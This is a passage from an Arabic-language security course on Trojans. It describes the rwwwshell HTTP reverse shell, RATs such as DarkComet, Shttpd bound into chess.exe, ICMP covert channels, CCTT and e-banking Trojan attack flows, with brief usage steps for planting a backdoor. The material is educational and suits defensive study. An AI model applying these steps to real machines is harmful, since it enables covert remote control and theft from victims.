‫إﻧﺷﺎء ‪ child‬وذﻟك ﻷﻧﮫ إذا ﺣدث وﺗوﻗﻔت‪ ،shell‬ﻓﺎن اﻟﻣﮭﺎﺟم ﯾﻣﻛﻧﮫ اﻟﺗﺣﻘﻖ ﻣﻧﮫ وإﺻﻼﺣﮫ ﻓﻲ اﻟﯾوم اﻟﺗﺎﻟﻲ‪ .‬ﻓﻲ ﺣﺎﻟﺔ إذا رأى ﻣدﯾر اﻟﺷﺑﻛﺔ‬
‫اﻻﺗﺻﺎل إﻟﻰ ﺧﺎدم اﻟﻣﮭﺎﺟم ﺛم ﻗﺎم ﺑﺎﻻﺗﺻﺎل ﺑﮫ ﺑﻧﻔﺳﮫ‪ ،‬ﻓﺎﻧﮫ ﺳوف ﯾرى ﻣﺟرد ﺧﺎدم وﯾب ﻣﻛﺳور ﺑﺳﺑب وﺟود ‪ (password) token‬ﻓﻲ‬
‫طﻠب ‪ GET CGI‬اﻟﻣﺷﻔرة‪) WWW proxies .‬ﻣﺛل‪ ،squid ،‬و‪ (full-featured web proxy cache‬ﯾﻛون ﻣدﻋم‪ .‬اﻟﺑرﻧﺎﻣﺞ ﯾﻘوم‬
‫ﺑﺈﺧﻔﺎء اﺳﻣﮫ ﻣن ﻗﺎﺋﻣﺔ اﻟﻌﻣﻠﯾﺎت‪ .‬اﻟﺑراﻣﺞ ﺻﻐﯾر ﺑﺷﻛل ﻣﻌﻘول ﻣﻊ اﻟﺑراﻣﺞ ‪ MASTER‬و‪ ،SLAVE‬ﻓﻘط ‪ 260‬ﺧط ﻟﻛل ﻣﻠف‪ .‬وﯾﺳﮭل‬
‫اﺳﺗﺧداﻣﮭﺎ‪ :‬ﻗم ﺑﺗﻌدﯾل ‪ rwwwsheLl.pl‬اﻟﻘﯾم اﻟﺻﺣﯾﺣﺔ‪ ،‬وذﻟك ﻋن طرﯾﻖ ﺗﻧﻔﯾذ "‪ "rwwwshell.pl slave‬ﻋﻠﻰ ‪ ،SLAVE‬وﺗﺷﻐﯾل‬
‫"‪ "rwwwshell.pl‬ﻋﻠﻰ ‪ MASTER‬ﻓﻘط ﻗﺑل اﻟوﻗت اﻟذي ﯾﺣﺎول ﻓﯾﮫ ‪ SLAVE‬اﻟﻘﯾﺎم ﺑﺎﻻﺗﺻﺎل‪.‬‬
‫‪HTTP Trojan: HTTP RAT‬‬
‫‪ RATs‬ھﻲ ﺑراﻣﺞ ﺧﺑﯾﺛﺔ اﻟﺗﻲ ﺗﻌﻣل ﺑﺧﻔﺎء ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾﻔﺔ وﺗﺳﻣﺢ ﻟﻠﻣﺗﺳﻠل اﻟوﺻول واﻟﺗﺣﻛم ﻋن ﺑﻌد‪ .‬ﯾﻣﻛن ﻠ ‪ RAT‬ﺗوﻓﯾر‬
‫‪ backdoor‬ﻟﻠﺳﯾطرة ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف‪ .‬ﺑﻣﺟرد أن ﯾﺗم اﺧﺗراق اﻟﻧظﺎم اﻟﮭدف‪ ،‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﺳﺗﺧداﻣﮭﺎ ﻟﺗوزﯾﻊ ‪ RAT‬ﻋﻠﻰ أﺟﮭزة‬
‫اﻟﻛﻣﺑﯾوﺗر اﻷﺧرى اﻟﺿﻌﯾﻔﺔ وإﻧﺷﺎء ‪ RAT .botnet‬ﺗﻣﻛن اﻟﻣﮭﺎﺟم ﻣن اﻟﺗﺣﻛم اﻹداري واﻟﺗﻲ ﯾﺟﻌل ﻣن اﻟﻣﻣﻛن ﻟﻠﻣﮭﺎﺟم ﻣﺷﺎھدة ﺟﻣﯾﻊ‬
‫اﻹﺟراءات اﻟﺗﻲ ﯾﻘوم ﺑﮭﺎ اﻟﮭدف ﺑﺎﺳﺗﺧدام ﻛﯾﻠوﺟرز أو أي ﻣن ﺑراﻣﺞ اﻟﺗﺟﺳس اﻷﺧرى‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم أﯾﺿﺎ ﺗﻧﻔﯾذ ﺗزوﯾر ﺑطﺎﻗﺎت اﻻﺋﺗﻣﺎن‬
‫وﺳرﻗﺔ اﻟﮭوﯾﺔ ﺑﺎﺳﺗﺧدام اﻟﻣﻌﻠوﻣﺎت اﻟﺳرﯾﺔ‪ ،‬وﯾﻣﻛﻧﮫ اﻟوﺻول اﻟﻰ ﻛﺎﻣﯾرات اﻟوﯾب وﺗﺳﺟﯾل اﻟﻔﯾدﯾو ﻋن ﺑﻌد‪ ،‬وأﺧذ ﻟﻘطﺎت)‪،(screenshot‬‬
‫وإﻋﺎدة ﺗﮭﯾﺋﺔ اﻻﻗراص‪ ،‬وﺣذف‪ ،‬ﺗﺣﻣﯾل‪ ،‬وﺗﻐﯾﯾر اﻟﻣﻠﻔﺎت‪ .‬ﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋن ﻷﻧﮫ ﯾﻌﻣل ﻣﺛل اﻟﺑراﻣﺞ اﻟﻌﺎدﯾﺔ وﻻ ﯾﻼﺣظ ﺑﺳﮭوﻟﺔ‪.‬‬

‫‪519‬‬
‫)‪Shttpd Trojan - HTTPS (SSL‬‬
‫‪ Shttpd‬ھو ﺧﺎدم ‪ HTTP‬ﺻﻐﯾر واﻟﺗﻲ ﯾﻣﻛن ﺗﺿﻣﯾﻧﮫ ﺑﺳﮭوﻟﺔ داﺧل أي ﺑرﻧﺎﻣﺞ‪ C++ source code .‬ﯾﺟب ان ﯾﺗم ﺗوﻓﯾﮭﺎ‪ .‬ﻋﻠﻰ اﻟرﻏم‬
‫ﻣن أن ‪ Shttpd‬ﻟﯾس ﺣﺻﺎن طروادة‪ ،‬ﻓﺈﻧﮫ ﯾﻣﻛن ﺗﺿﻣﯾﻧﮫ ﺑﺳﮭوﻟﺔ ﻣﻊ ﻣﻠف ‪ chess.exe‬واﻟﺗﻲ ﯾﻣﻛﻧﮭﺎ ﺗﺣوﯾل اﻟﻛﻣﺑﯾوﺗر إﻟﻰ ﺧﺎدم وﯾب ﻏﯾر‬
‫ﻣرﺋﻲ‪.‬‬
‫إﺻﺎﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف ﻣﻊ ‪.chess.exe‬‬ ‫‪-‬‬

‫‪ Shttpd‬ﯾﻧﺑﻐﻲ أن ﯾﻌﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ واﻻﺳﺗﻣﺎع ﻋﻠﻰ اﻟﻣﻧﻔذ ‪.(SSL) 443‬‬ ‫‪-‬‬
‫ﯾﺗم اﻻﺗﺻﺎل ﺑﺎﻟﮭدف ﻋن طرﯾﻖ اﺳﺗﺧدام ﻣﺗﺻﻔﺢ وﯾب‪.http://10.0.0.5:443 :‬‬ ‫‪-‬‬
‫‪ICMP TUNNELING‬‬
‫ﻣﻔﮭوم )‪ ICMP tunnel(ICMPTX‬ﺑﺳﯾط‪ .‬ﺣﯾث ﯾﻌﻣل ﻋن طرﯾﻖ ﺣﻘن ‪ arbitrary information‬ﻓﻲ ﺟزء اﻟﺑﯾﺎﻧﺎت ﻟﻠﺣزم‬
‫‪ ICMP_ECHO‬و‪ .ICMP_ECHOREPLY‬ﯾﺣﺗوي ‪ ICMP_ECHO traffic‬ﻋﻠﻰ ﻗﻧﺎة اﻟﺳرﯾﺔ )‪ (Covert channel‬واﻟﺗﻲ‬
‫ﯾﻣﻛن ﺗدﻣﯾرھﺎ ﺑﺳﺑب ‪ .tunnel‬أﺟﮭزة اﻟﺷﺑﻛﺔ ﻻ ﺗﻘوم ﺑﻔﻠﺗرة ﻣﺣﺗوﯾﺎت ‪ ،ICMP_ECHO traffic‬ﻣﻣﺎ ﯾﺟﻌل اﺳﺗﺧدام ھذه اﻟﻘﻧﺎة ﺟذاﺑﺔ‬
‫ﺑﺎﻟﻧﺳﺑﺔ ﻟﻠﻘراﺻﻧﺔ‪.‬‬
‫اﻟﻣﮭﺎﺟﻣون ﺑﺑﺳﺎطﺔ ﯾﻘوﻣون ﺑﺎﻟﻣرور ﻣن ﺧﻼﻟﮭﺎ‪ ،‬إﺳﻘﺎطﮭﺎ‪ ،‬أو إﻋﺎدﺗﮭﺎ‪ .‬ﺣزﻣﺎ اﻟﺗروﺟﺎن ﻧﻔﺳﮭﺎ ﺑﺗﻛون ‪ masquerading‬ﻣﺛل‬
‫‪ ICMP_ECHO traffic‬اﻟﻣﻌروﻓﺔ‪ .‬ﺣﯾث اﻟﺣزم ﯾﻣﻛﻧﮭﺎ ﺗﻐﻠﯾف )‪ (tunnel‬أي ﻣن اﻟﻣﻌﻠوﻣﺎت اﻟﻣطﻠوﺑﺔ‪.‬‬
‫اﻟﻘﻧوات اﻟﺳرﯾﺔ )‪ (Covert channel‬ھﻲ اﻟطرﯾﻘﺔ اﻟﺗﻲ ﺗﻣﻛن اﻟﻣﮭﺎﺟم ﻣن إﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻓﻲ ﺑروﺗوﻛول ﻏﯾر ﻗﺎﺑﻠﮫ ﻟﻠﻛﺷف‪ .‬ﻓﮭﻲ ﺗﻌﺗﻣد ﻋﻠﻰ‬
‫ﺗﻘﻧﯾﺎت ﺗﺳﻣﻰ ‪ ،tunnel‬واﻟﺗﻲ ﺗﺳﻣﺢ ﺑﺣﻣل ﺑروﺗوﻛول واﺣد ﻋﻠﻰ ﺑروﺗوﻛول آﺧر‪ .‬ﯾﺗم ﺗﻌرﯾف اﻟﻘﻧﺎة اﻟﺳرﯾﺔ )‪ (Covert channel‬ﺑﺎﻋﺗﺑﺎرھﺎ‬
‫وﻋﺎء واﻟﺗﻲ ﻣن ﺧﻼﻟﮭﺎ ﯾﻣﻛن أن ﺗﻌﺑر اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﻋﻣوﻣﺎ ﻻ ﺗﺳﺗﺧدم ﻟﺗﺑﺎدل اﻟﻣﻌﻠوﻣﺎت‪ .‬ﻻ ﯾﻣﻛن أن ﯾﺗم اﻟﻛﺷف ﻋن اﻟﻘﻧوات اﻟﺳرﯾﺔ ﺑﺎﺳﺗﺧدام‬
‫أﺳﺎﻟﯾب أﻣن اﻟﻧظﺎم اﻟﻘﯾﺎﺳﯾﺔ‪ .‬أي ﻋﻣﻠﯾﺔ أو ﺑت ﻣن اﻟﺑﯾﺎﻧﺎت ﯾﻣﻛﻧﮭﺎ أن ﺗﻛون اﻟﻘﻧﺎة اﻟﺳرﯾﺔ)‪ . (Covert channel‬ھذا ﯾﺟﻌﻠﮭﺎ ﻋﺑﺎره ﻋن‬
‫‪ attractive mode‬ﻟﻧﻘل ﺣﺻﺎن طروادة‪ ،‬ﺣﯾث ﯾﻣﻛن أن ﯾﺳﺗﺧدم اﻟﻣﮭﺎﺟم اﻟﻘﻧﺎة اﻟﺳرﯾﺔ ﻟﺗﺛﺑﯾت ‪ backdoor‬ﻋﻠﻰ اﻟﺟﮭﺎز اﻟﻣﺳﺗﮭدف‪.‬‬

‫‪520‬‬
‫‪Remote Access Trojans‬‬
‫‪ Remote access Trojans‬ﯾوﻓر اﻟﺳﯾطرة اﻟﻛﺎﻣﻠﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺳﺗﮭدف إﻟﻰ اﻟﻣﮭﺎﺟﻣﯾن وﺗﻣﻛﻧﮭم ﻣن اﻟوﺻول إﻟﻰ اﻟﻣﻠﻔﺎت ﻋن ﺑﻌد‪،‬‬
‫واﻟﻣﺣﺎدﺛﺎت اﻟﺧﺎﺻﺔ‪ ،‬واﻟﺑﯾﺎﻧﺎت اﻟﻣﺣﺎﺳﺑﯾﺔ‪ ،‬وھﻠم ﺟرا ﻓﻲ اﻟﺟﮭﺎز اﻟﮭدف‪ .‬ﯾﻌﻣل ‪ Remote access Trojans‬ﻛﺧﺎدم‪ ،‬وﯾﺳﺗﻣﻊ ﻋﻠﻰ اﻟﻣﻧﻔذ‬
‫اﻟذي ﻟﯾس ﻣن اﻟﻣﻔﺗرض أن ﺗﻛون ﻣﺗﺎﺣﺔ ﻟﻣﮭﺎﺟﻣﻲ اﻹﻧﺗرﻧت‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬إذا ﻛﺎن اﻟﮭدف وراء ﺟدار اﻟﺣﻣﺎﯾﺔ ﻋﻠﻰ اﻟﺷﺑﻛﺔ‪ ،‬إذا ﻓﮭﻧﺎك ﻓرﺻﺔ ﻗﻠﯾﻠﮫ‬
‫ﺳﻛون ﻓﯾﮭﺎ اﻟﻣﮭﺎﺟم ﻗﺎدرا ﻋﻠﻰ اﻻﺗﺻﺎل إﻟﻰ اﻟﺗروﺟﺎن‪ .‬ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن ﻋﻠﻰ ﻧﻔس اﻟﺷﺑﻛﺔ اﻟﺗﻲ ﺗﻘﻊ ﺧﻠف ﺟدار اﻟﺣﻣﺎﯾﺔ اﻟوﺻول ﺑﺳﮭوﻟﺔ إﻟﻰ‬
‫ﺣﺻﺎن طروادة‪.‬‬
‫أﻣﺛﻠﺔ ﻋﻠﻰ ذﻟك ﺗﺷﻣل‪ Back Orifice Trojans :‬و‪ .NetBus Trojans‬ﻣﺛﺎل آﺧر‪ ،‬ھو ‪ Bugbear virus‬اﻟﺗﻲ ﺿرﺑت ﺷﺑﻛﺔ‬
‫اﻹﻧﺗرﻧت ﻓﻲ ﺳﺑﺗﻣﺑر ‪ ،2002‬ﺗﺛﺑﯾت ﺣﺻﺎن طروادة ﻋﻠﻰ اﻷﻧظﻣﺔ اﻷھداف‪ ،‬ﻣﻣﺎ ﯾﺗﯾﺢ اﻟوﺻول إﻟﻰ اﻟﺑﯾﺎﻧﺎت اﻟﺣﺳﺎﺳﺔ ﻟﻠﻣﮭﺎﺟﻣﯾن ﻋن ﺑﻌد‪.‬‬
‫ھذا اﻟﺗروﺟﺎن ﯾﻌﻣل ﻣﺛل اﻟوﺻول إﻟﻰ ﺳطﺢ اﻟﻣﻛﺗب اﻟﺑﻌﯾد‪ .‬اﻟﻣﮭﺎﺟم ﯾﻛﺳب اﻟوﺻول ‪ GUI‬اﻟﻛﺎﻣل إﻟﻰ اﻟﻧظﺎم اﻟﺑﻌﯾد‪.‬‬
‫ھذه اﻟﻌﻣﻠﯾﺔ ھﻲ ﻛﻣﺎ ﯾﻠﻲ‪:‬‬
‫‪ -1‬إﺻﺎﺑﺔ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر)‪ (Rebecca's‬ﺒ ‪ server.exe‬ﺛم اﻟﺗﺧطﯾط ﻹﻧﺷﺎء اﺗﺻﺎل ﻋﻛﺳﻲ ﻣﻊ اﻟﺗروﺟﺎن‪.‬‬
‫‪ -2‬رﺑط اﻟﺗروﺟﺎن ﺑﺎﻟﻣﻧﻔذ ‪ 80‬إﻟﻰ اﻟﻣﮭﺎﺟم اﻟﻣﺗواﺟد ﻓﻲ روﺳﯾﺎ ﻋﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل ﻟﺗﺄﺳﯾس اﺗﺻﺎل ﻋﻛﺳﻲ‪.‬‬
‫‪ -3‬اﻟﻣﮭﺎﺟم )‪ (Jason‬ﺗﺻﺑﺢ ﻟدﯾﮫ ﺗﺣﻛم ﻛﺎﻣل ﺑﺟﮭﺎز اﻟﺿﺣﯾﺔ )‪.(Rebecca's‬‬
‫‪Remote Access Trojan: Rat DarkComet and Apocalypse‬‬

‫‪ DarkComet‬ھﻲ اﻷداة اﻟﺗﻲ ﺗﺗﯾﺢ ﻟك اﻟوﺻول ﻋن ﺑﻌد إﻟﻰ اﻟﺿواﺑط واﻻﻣﺗﯾﺎزات اﻹدارﯾﺔ ﻣن اﻟﺟﮭﺎز اﻟﻣﺻﺎب دون ﻋﻠم اﻟﻣﺳﺗﺧدم أو‬
‫إذﻧﮫ‪ .‬ﻓﺈﻧﮫ ﯾوﻓر ﻟك اﻟوﺻول إﻟﻰ اﻟﻌﻣﻠﯾﺎت‪ ،registry ،‬ﺳطر اﻷواﻣر)‪ ،(cmd‬ﻛﺎﻣﯾرات اﻟوﯾب واﻟﻣﯾﻛروﻓوﻧﺎت واﻟﺗطﺑﯾﻘﺎت وﺣﺗﻰ ﯾﻣﻛن‬
‫ﺗوﻓﯾر ﻛﻠوﻏر ﻛﻠﻣﺎ ﻛﻧت ﺗﺳﺗﺧدم ﻧظﺎم‪.‬‬
‫‪ Apocalypse Remote Access Trojan‬ھﻲ اﻷداة اﻟﺗﻲ ﺗﺳﻣﺢ ﻟك ﺑﺗﻌدﯾل ‪ registry‬ﺑﺎﻟﻛﺎﻣل واﻟﺳﻣﺎح ﻟﻠﻣﻠﻔﺎت )‪ (.dll‬ﻟﺗﺷﻐﯾل اﻟﻣﻠﻔﺎت‬
‫اﻟﺗﻧﻔﯾذﯾﺔ‪ .‬ھذا ﯾﻌﻣل ﻓﻲ اﻟوﺿﻊ اﻟﻐﯾر ﻣرﺋﻲ ﻋﻧدﻣﺎ ﯾﺗم ﺗﻧﻔﯾذه‪.‬‬

‫‪521‬‬
‫‪Covert Channel Trojan: CCTT‬‬
‫أدوات ﻗﻧوات اﻻﺗﺻﺎل اﻟﺳرﯾﺔ )‪ (Covert Channel Tunneling Tools‬ھﻲ أداة ﻹﻧﺷﺎء اﻟﻘﻧوات اﻟﻣﺧﻔﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾوﻓر ﻟك اﻟﻌدﯾد ﻣن‬
‫اﻟطرق اﻟﻣﺣﺗﻣﻠﺔ ﻟﺗﺣﻘﯾﻖ واﻟﺳﻣﺎح ﻟﻘﻧوات ﻧﻘل اﻟﺑﯾﺎﻧﺎت ﻓﻲ دﻓﻖ اﻟﺑﯾﺎﻧﺎت)‪ (HTTP ،UDP ،TCP) (data stream‬اﻟﺗﻲ أذن ﺑﮭﺎ ﻧظﺎم‬
‫اﻟﺗﺣﻛم ﺑﺎﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ‪ .‬أدوات ﻗﻧوات اﻻﺗﺻﺎل اﻟﺳري )‪ (CCTT‬ﺗروﺟﺎن ﯾﻘدم ﻟك ﺗﻘﻧﯾﺎت اﻻﺧﺗراق اﻟﻣﺧﺗﻠﻔﺔ‪ ،‬وﺧﻠﻖ ﻗﻧوات ﻟﻧﻘل‬
‫اﻟﺑﯾﺎﻧﺎت ﻓﻲ دﻓﻖ اﻟﺑﯾﺎﻧﺎت )‪ (data stream‬اﻟﺗﻲ أذن ﺑﮭﺎ ﻧظﺎم اﻟﺗﺣﻛم ﺑﺎﻟوﺻول إﻟﻰ اﻟﺷﺑﻛﺔ‪ .‬أﻧﮭﺎ ﺗﻣﻛن اﻟﻣﮭﺎﺟﻣون ﻣن اﻟﺣﺻول ﻋﻠﻰ‬
‫ﻗذﯾﻔﺔ )‪(shell‬ﻟﺧﺎدم ﺧﺎرﺟﻲ ﻣن داﺧل اﻟﺷﺑﻛﺔ اﻟداﺧﻠﯾﺔ واﻟﻌﻛس‪ .‬ﻓﺈﻧﮫ ﯾﺟﻌل اﻟﻘﻧوات‪ TCP/UDP/HTTP CONNECT|POST‬ﺗﺳﻣﺢ ﺒ‬
‫‪ ،POP ،SMTP ،SSH) TCP data streams‬اﻟﺦ‪ (.‬ﺑﯾن ﺧﺎدم ﺧﺎرﺟﻲ و‪ box‬ﺿﻣن اﻟﺷﺑﻛﺔ اﻟداﺧﻠﯾﺔ‪.‬‬
‫‪E-Banking Trojans‬‬
‫‪ E-banking Trojans‬ھﻲ ﺧطﯾرة ﺟدا وأﺻﺑﺣت ﺗﺷﻛل ﺗﮭدﯾدا رﺋﯾﺳﯾﺎ ﻟﺗﻧﻔﯾذﯾﺎت اﻟﻣﻌﺎﻣﻼت اﻟﻣﺻرﻓﯾﺔ ﻋﺑر اﻹﻧﺗرﻧت‪ .‬ﺣﯾث ﯾﺗم ﺗﺛﺑﯾت‬
‫اﻟﺗروﺟﺎن ھذا ﻋﻠﻰ ﺟﮭﺎز ﻛﻣﺑﯾوﺗر اﻟﺿﺣﯾﺔ ﻋﻧدﻣﺎ ﻧﻘر ﻋﻠﻰ ﻣرﻓﻖ ﺑرﯾد إﻟﻛﺗروﻧﻲ أو زارة ﺑﻌض اﻹﻋﻼﻧﺎت وﻟو ﻟﻣرة واﺣدة ﺑﻣﺟرد ﺗﺳﺟﯾل‬
‫دﺧول اﻟﮭدف إﻟﻰ ﻣوﻗﻊ اﻟﻣﺻرﻓﻲ‪ .‬ھذا اﻟﺗروﺟﺎن ﯾﺗم ﺑرﻣﺟﺗﮫ ﻣﺳﺑﻘﺎ ﻣﻊ اﻟﺣد اﻷدﻧﻰ واﻟﺣد اﻷﻗﺻﻰ ﻟﻠﺳرﻗﺔ‪ .‬ﻟذﻟك ﻻ ﯾﺳﺣب ﺟﻣﯾﻊ اﻻﻣوال ﻣن‬
‫اﻟﺑﻧك‪ .‬ﺛم ﯾﻘوم ھذا اﻟﺗروﺟﺎن ﺑﺄﺧذ ﻟﻘطﺎت ‪ screenshot‬ﻣن ﻛﺷف ﺣﺳﺎب اﻟﺑﻧك؛ اﻟﺿﺣﺎﯾﺎ ﻟﯾﺳوا ﻋﻠﻰ ﺑﯾﻧﺔ ﻣن ھذا اﻟﻧوع ﻣن اﻻﺣﺗﯾﺎل وﯾﻌﺗﻘد‬
‫أﻧﮫ ﻻ ﯾوﺟد اﺧﺗﻼف ﻓﻲ اﻟرﺻﯾد اﻟﻣﺻرﻓﻲ ﻣﺎ ﻟم ﯾﺗﺣﻘﻖ ﻋن ﺣﺳﺎﺑﮫ ﻣن اﻟﻧظم اﻷﺧرى أو ﻣن أﺟﮭزة اﻟﺻراف اﻵﻟﻲ‪ .‬ﻓﻘط ﻋﻧدﻣﺎ ﯾﺗﺣﻘﻖ ﻣن‬
‫ﺣﺳﺎﺑﮫ ﺳوف ﯾﻼﺣظ اﻻﺧﺗﻼﻓﺎت‪.‬‬
‫ﯾوﺿﺢ اﻟرﺳم اﻟﺑﯾﺎﻧﻲ اﻟﺗﺎﻟﻲ ﻛﯾف ﯾﺗم اﻟﮭﺟوم اﻟذي ﯾﻧﻔذ ﺑﺎﺳﺗﺧدام أ‪. E-banking Trojans‬‬

‫‪522‬‬
‫اﻟﻣﮭﺎﺟم ھﻧﺎ أوﻻ ﯾﻘوم ﺑﺈﺻﺎﺑﺔ اﻹﻋﻼﻧﺎت اﻟﺧﺑﯾﺛﺔ وﻧﺷر ھذه اﻹﻋﻼﻧﺎت ﺑﯾن اﻟﻣواﻗﻊ اﻟﺣﻘﯾﻘﯾﺔ‪ .‬ﻋﻧد وﺻول اﻟﺿﺣﺎﯾﺎ ﻟﻠﻣوﻗﻊ اﻟﻣﺻﺎب‪ ،‬ﻓﺈﻧﮫ ﺗﻠﻘﺎﺋﯾﺎ‬
‫ﯾﻘوم ﺑﺗوﺟﯾﮭﮫ ﻟﻣوﻗﻊ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﻧﺗرﻧت ﻣن ﺣﯾث ﯾﺣﺻل ﺗﺣﻣﯾل ‪ exploit kit‬ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺈن ‪ exploit kit‬ﺗﺳﻣﺢ‬
‫ﻟﻠﻣﮭﺎﺟﻣﯾن ﺑﺎﻟﺳﯾطرة ﻋﻠﻰ ﻣﺎ ﺗم ﺗﺣﻣﯾﻠﮫ ﻋﻠﻰ ﻧظﺎم اﻟﺿﺣﯾﺔ وﯾﺳﺗﺧدم ھذا ﻟﺗﺛﺑﯾت ﺣﺻﺎن طروادة‪ .‬ھذه اﻟﺑراﻣﺞ اﻟﺿﺎرة )‪ (malware‬ﻏﺎﻣﺿﮫ‬
‫ﻟﻠﻐﺎﯾﺔ وﻻ ﯾﻣﻛن اﻟﻛﺷف ﻋﻧﮭﺎ اﻻ ﺑواﺳطﺔ ﻋدد ﻗﻠﯾل ﻣن اﻷﻧظﻣﺔ اﻟﻣﺿﺎدة ﻟﻠﻔﯾروﺳﺎت‪ .‬ﻧظﺎم اﻟﺿﺣﯾﺔ أﺻﺑﺢ اﻵن ‪ botnet‬ﻣن ﺣﯾث اﻟﺗروﺟﺎن‬
‫ﯾﻣﻛﻧﮫ ﺑﺳﮭوﻟﮫ إرﺳﺎل واﺳﺗﻘﺑﺎل اﻟﺗﻌﻠﯾﻣﺎت ﻣن وﺣدة اﻟﺗﺣﻛم وﺧﺎدم اﻷواﻣر دون ﻋﻠم اﻟﺿﺣﯾﺔ‪ .‬ﻋﻧد وﻟوﻟﺞ اﻟﺿﺣﯾﺔ اﻟﻰ ﺣﺳﺎﺑﮫ اﻟﻣﺻرﻓﻲ ﻣن‬
‫ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺻﺎب‪ ،‬ﻓﺎن ﺟﻣﯾﻊ اﻟﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎﺳﺔ‪ ،‬أي اﻟﺗﻲ ﯾﺳﺗﺧدﻣﮭﺎ اﻟﺿﺣﯾﺔ ﻓﻲ اﻟوﺻول اﻟﻰ ﺣﺳﺎﺑﮫ اﻟﻣﺻرﻓﻲ )ﻣﻌﻠوﻣﺎت اﻟﺣﺳﺎب( ﻣﺛل‬
‫اﻋﺗﻣﺎد ﺗﺳﺟﯾل اﻟدﺧول )اﺳم اﻟﻣﺳﺗﺧدم وﻛﻠﻣﺔ اﻟﻣرور(‪ ،‬ورﻗم اﻟﮭﺎﺗف‪ ،‬رﻗم اﻟﺿﻣﺎن‪ ،‬وﺗﺎرﯾﺦ اﻟﻣﯾﻼد‪ ،‬اﻟﺦ ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ ﺧﺎدم اﻟﺗﺣﻛم واﻟﻘﯾﺎدة‬
‫ﻣن ﻗﺑل اﻟﺗروﺟﺎن‪ .‬إذا ﻗﺎم اﻟﺿﺣﯾﺔ ﺑﺎﻟوﺻول إﻟﻰ ﻗﺳم اﻟﻣﻌﺎﻣﻼت اﻟﻣﺻرﻓﯾﺔ ﻓﻲ ﻣوﻗﻊ اﻟوﯾب ﻟﻠﺑﻧك ﻹﺟراء اﻟﻣﻌﺎﻣﻼت ﻋﺑر اﻹﻧﺗرﻧت‪ ،‬ﻓﺎن‬
‫اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم إدﺧﺎﻟﮭﺎ ﻣن ﻗﺑل اﻟﺿﺣﯾﺔ ﻋﻠﻰ ﺷﻛل اﻟﻣﻌﺎﻣﻠﺔ ﯾﺗم إرﺳﺎﻟﮭﺎ إﻟﻰ ﻣراﻗﺑﺔ وﻗﯾﺎدة ﺧﺎدم ﺑدﻻ ﻣن ﻣوﻗﻊ اﻟﺑﻧك‪ .‬ﺣﯾث ﯾﻘوم اﻟﺧﺎدم‬
‫ﺑﺗﺣﻠﯾل وﺗرﺟﻣﺔ اﻟﻣﻌﻠوﻣﺎت وﯾﺣدد اﻻﻣوال اﻟﻣﻧﺎﺳﺑﺔ ﻟﺳﺣﺑﮭﺎ ﻣن اﻟﺣﺳﺎب اﻟﻣﺻرﻓﻲ‪ .‬طروادة ﯾﺗﻠﻘﻰ اﻟﺗﻌﻠﯾﻣﺎت ﻣن اﻟﺧﺎدم ﻹرﺳﺎل ﺷﻛل‬
‫اﻟﻣﻌﺎﻣﻼت ھذه واﻟﺗﻲ ﯾﺗم ﺗﺣدﯾﺛﮭﺎ ﺑواﺳطﺔ اﻟﺧﺎدم إﻟﻰ اﻟﺑﻧك ﻟﺗﺣوﯾل اﻷﻣوال إﻟﻰ ﺣﺳﺎب اﻟﻣﮭﺎﺟم‪ .‬واﻟﺗﻘﺎرﯾر اﻟﺗﻲ ﺗﺄﺗﻰ ﻣن اﻟﺑﻧك ﻟﻠﺗﺄﻛﯾد ﺣول‬
‫ﻧﺟﺎح‪/‬ﻓﺷل اﻟﺻﻔﻘﺔ ﻣن اﻟﻣﺎل اﻟﺗﻲ ﺗم ﻧﻘﻠﮭﺎ أﯾﺿﺎ ﻣن طروادة إﻟﻰ اﻟﺧﺎدم‪.‬‬
‫‪Banking Trojan Analysis‬‬

‫‪ Banker Trojan‬ھو ﺑرﻧﺎﻣﺞ ﺧﺑﯾث ﯾﺳﻣﺢ ﺑﺎﻟﺣﺻول ﻋﻠﻰ اﻟﻣﻌﻠوﻣﺎت اﻟﺷﺧﺻﯾﺔ ﺣول اﻟﻣﺳﺗﺧدﻣﯾن واﻟﻌﻣﻼء اﻟذﯾن ﯾﺳﺗﺧدﻣون اﻟﻧظم‬
‫اﻟﻣﺻرﻓﯾﺔ واﻟدﻓﻊ ﻋﺑر اﻹﻧﺗرﻧت‪.‬‬
‫ﯾﻧطوي ﺗﺣﻠﯾل طروادة اﻟﻣﺻرﻓﻲ ﻋﻠﻰ ﺛﻼﺛﺔ أﻧواع أﺳﺎﺳﯾﺔ ﻛﺎﻻﺗﻰ‪:‬‬
‫‪ Transaction Authentication Number (TAN) :Tan Gabbler‬ﺗﺳﺗﺧدم ﻟﻠﻣﺻﺎدﻗﺔ ﻋﻠﻰ اﻟﻣﻌﺎﻣﻼت اﻟﺑﻧﻛﯾﺔ ﻋﺑر اﻻﻧﺗرﻧت‪،‬‬
